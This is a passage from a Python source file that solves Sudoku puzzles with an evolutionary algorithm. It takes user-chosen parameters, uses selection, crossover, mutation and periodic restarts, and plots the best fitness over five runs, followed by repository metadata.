list of selected individuals that will be used in the evolutionary algorithm.\n \"\"\"\n sorted_population = sorted(zip(population_list, fitness_population), key=lambda ind_fit: ind_fit[1])\n\n # Returns a new list of selected individuals that will be used in the evolutionary algorithm based on the truncation\n # rate.\n return [ind_sudoku for ind_sudoku, fitness in sorted_population[0: int(POPULATION_SIZE * TRUNCATION_RATE)]]\n\n\ndef crossover_population(mating_pool_list):\n \"\"\"\n Function uses the crossover_individual() function to perform a uniform crossover between two parents to produce an\n offspring. 
This process creates a number of offspring aimed at refilling the population of the original mating pool\n back to the original population size, which then undergoes mutation in the next step of the evolutionary algorithm.\n This preserves the previously best-selected individuals from the initial population, and achieves population\n diversity.\n :param mating_pool_list: The list population_lists.\n :return: Returns a list of newly bred candidate Sudoku solutions including the best chosen ones from the\n initial truncation selection.\n \"\"\"\n offspring_list = []\n\n # Creates one offspring per iteration, and appends it onto the offspring list\n for crossovers in range(POPULATION_SIZE - len(mating_pool_list)):\n crossed_over_grid = crossover_individual(choice(mating_pool_list), choice(mating_pool_list))\n offspring_list.append(crossed_over_grid)\n\n # Return the mating pool along with the offspring to create one population list that will all undergo mutation\n # in the later processes.\n return mating_pool_list + offspring_list\n\n\ndef mutate_population(population_list, filename):\n \"\"\"\n Function uses and applies the mechanics of the individual-level mutation operator to perform mutations across all\n candidate Sudoku solution grids in a specified population.\n :param population_list: The list of sudoku solution grids.\n :param filename: The specified text file that defines the fixed puzzle cells.\n :return: Returns a list of mutated sudoku solution grids\n \"\"\"\n return [mutate_individual(ind_sudoku, filename) for ind_sudoku in population_list]\n\n\ndef best_population_of_sudokus(population_list, fitness_population):\n \"\"\"\n Function that gets the best Sudoku solution grid along with its corresponding fitness score.\n :param population_list: The list of sudoku solution grids.\n :param fitness_population: The list fitness_scores for the corresponding Sudoku solution grids.\n :return: Returns the (grid, fitness score) pair with the lowest fitness score in the population.\n \"\"\"\n return sorted(zip(population_list, fitness_population), key=lambda individual_fitness: individual_fitness[1])[0]\n\n\n##########################\n# EVOLUTIONARY ALGORITHM #\n##########################\ndef evolve(filename):\n \"\"\"\n Function represents the evolutionary algorithm for solving Sudoku puzzles, implementing all problem-specific\n components to the task, for instance the appropriate solution space and solution representation, fitness function,\n crossover and mutation operators for the chosen representation, population initialisation, selection and\n replacement methods, and an appropriate termination criterion.\n :param filename: Specified name of file, which is essentially the Sudoku puzzle grid.\n :return: Returns a list of the best fitness score from each generation. 
The size of the list will be dependent on\n the number of generations requested from user input.\"\"\"\n population = generate_population(filename, POPULATION_SIZE)\n fitness_pop_scores = generate_fitness_scores(population)\n best_fitness_score = min(fitness_pop_scores)\n gen = 0\n total_gens = 0\n # This list will store the best fitness score of each generation.\n best_fits = []\n\n # While the total number of generations run has not reached the specified value of NUMBER_GENERATIONS, keep running\n # the following code within the while loop.\n while total_gens < NUMBER_GENERATIONS:\n gen += 1\n total_gens += 1\n\n # Select population of individuals to undergo crossover and mutation\n mating_pool = select_population(population, fitness_pop_scores)\n\n # Perform crossover to create new offspring\n offspring_population = crossover_population(mating_pool)\n\n # Mutate the crossed-over mating pool of offspring\n population = mutate_population(offspring_population, filename)\n\n fitness_pop_scores = generate_fitness_scores(population)\n worst_fitness_score = max(fitness_pop_scores)\n best_sudoku_grid, best_fitness_score = best_population_of_sudokus(population, fitness_pop_scores)\n\n best_fits.append(best_fitness_score)\n\n # If the gen counter reaches the reset point, a restart technique that prevents convergence to local minima\n # (also known as Judgement Day) keeps the current candidate Sudoku solution with the best (lowest) fitness\n # score, and repopulates with (population size - 1) new candidate solutions.\n if gen == RESTART_POINT:\n print(\"#%2d\" % total_gens, \"Highest Fitness (Worst):%3d\" % worst_fitness_score, \" \",\n \"Lowest Fitness (Best):%3d\" % best_fitness_score)\n\n # When gen equals RESTART_POINT, it resets to 0, continues to be incremented, and the same process repeats\n gen = 0\n\n selected_grid = best_sudoku_grid\n fitness_pop_scores.remove(best_fitness_score)\n population.remove(best_sudoku_grid)\n population = generate_population(filename, POPULATION_SIZE - 1)\n population.append(selected_grid)\n fitness_pop_scores = generate_fitness_scores(population)\n best_fitness_score = min(fitness_pop_scores)\n\n print(\"------------------------------------------RESTART-----------------------------------------------\")\n print()\n\n # If the best fitness score reaches 0, print a statement indicating the success of the algorithm in finding a\n # solution to the given Sudoku puzzle. Subsequently, print the whole Sudoku Grid that presents the optimal\n # solution in a (9 x 9) manner. Print out the total number of generations run to reach this point.\n elif best_fitness_score == 0:\n print()\n print(\"------------------------------------------FINISHED----------------------------------------------\")\n for n in best_sudoku_grid:\n print(n)\n print()\n print(\"Awesome! 
Best Fit of 0 Reached!\")\n print(\"Total number of Generations Ran: \" + str(total_gens))\n print()\n break\n\n print(str(total_gens) + \" Desired Generations Reached!\")\n print()\n return best_fits\n\n\ndef plot_results(run1, run2, run3, run4, run5):\n \"\"\"\n Function plots all 5 runs onto one graph.\n :param run1: First run of the experiment in evolve(filename)\n :param run2: Second run of the experiment in evolve(filename)\n :param run3: Third run of the experiment in evolve(filename)\n :param run4: Fourth run of the experiment in evolve(filename)\n :param run5: Fifth run of the experiment in evolve(filename)\n \"\"\"\n # Plots 5 individual lines onto the same graph.\n plt.plot(run1, label=\"1st Run\")\n plt.plot(run2, label=\"2nd Run\")\n plt.plot(run3, label=\"3rd Run\")\n plt.plot(run4, label=\"4th Run\")\n plt.plot(run5, label=\"5th Run\")\n\n plt.xlabel(\"Number of Generations\")\n plt.ylabel(\"Fitness of the Best Candidate From Population\")\n plt.title(\"Overall Evolutionary Algorithm Performance Graph For Population Size: {}\".format(POPULATION_SIZE))\n plt.legend()\n plt.show()\n\n\ndef run_5_times(filename):\n \"\"\"\n Function will iteratively run the same evolve() experiment 5 times for a specified filename as shown below.\n :param filename: Specified name of file, which is essentially the Sudoku puzzle grid.\n \"\"\"\n total_runs = []\n for n in range(5):\n print(\"Performing Run #\" + str(n + 1))\n total_runs.append(evolve(filename))\n\n plot_results(total_runs[0], total_runs[1], total_runs[2], total_runs[3], total_runs[4])\n\n\nif __name__ == \"__main__\":\n grid1 = \"grid1.txt\"\n grid2 = \"grid2.txt\"\n grid3 = \"grid3.txt\"\n\n ##############\n # USER INPUT #\n ##############\n print(\"### WELCOME TO SUDOKU SOLVER USING AN EVOLUTIONARY ALGORITHM ###\")\n print()\n choice_of_grid = input(\"Specify Grid File to Run [grid1, grid2 or grid3]: \")\n population_size_choice = input(\"Population Size [10, 100, 1000 or 10000]: \")\n POPULATION_SIZE = int(population_size_choice)\n truncation_choice = input(\"Truncation Rate [100% = 1.0; 50% = 0.5; and etc.]: \")\n TRUNCATION_RATE = float(truncation_choice)\n mutation_rate_choice = input(\"Mutation Rate Ranging from \" + str(0.01) + \" to \" + str(1.00) + \": \")\n MUTATION_RATE = float(mutation_rate_choice)\n number_gens = input(\"Number of Generations to Be Done: \")\n NUMBER_GENERATIONS = int(number_gens)\n reset_point = input(\"Please Select a Reset Point After a Specified Number of Generations. \\n\" +\n \"This is to Prevent Convergence to a Local Minimum: \")\n RESTART_POINT = int(reset_point)\n print()\n print(\"Thank You For Your Input! 
The Program Will Run Shortly...\")\n print()\n\n if choice_of_grid == \"grid1\":\n run_5_times(grid1)\n\n elif choice_of_grid == \"grid2\":\n run_5_times(grid2)\n\n elif choice_of_grid == \"grid3\":\n run_5_times(grid3)\n", "repo_name": "IndraBr16/EvolutionaryAlgorithms", "sub_path": "sudoku_ea.py", "file_name": "sudoku_ea.py", "file_ext": "py", "file_size_in_byte": 22760, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "random.randint", "line_number": 146, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 151, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 192, "usage_type": "call"}, {"api_name": "random.uniform", "line_number": 212, "usage_type": "call"}, {"api_name": "random.sample", "line_number": 220, "usage_type": "call"}, {"api_name": "random.shuffle", "line_number": 234, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 329, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 451, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 451, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 452, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 452, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 453, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 453, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 454, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 454, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 455, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 455, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 457, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 457, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 458, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 458, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 459, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 459, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 460, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 460, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 461, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 461, "usage_type": "name"}]}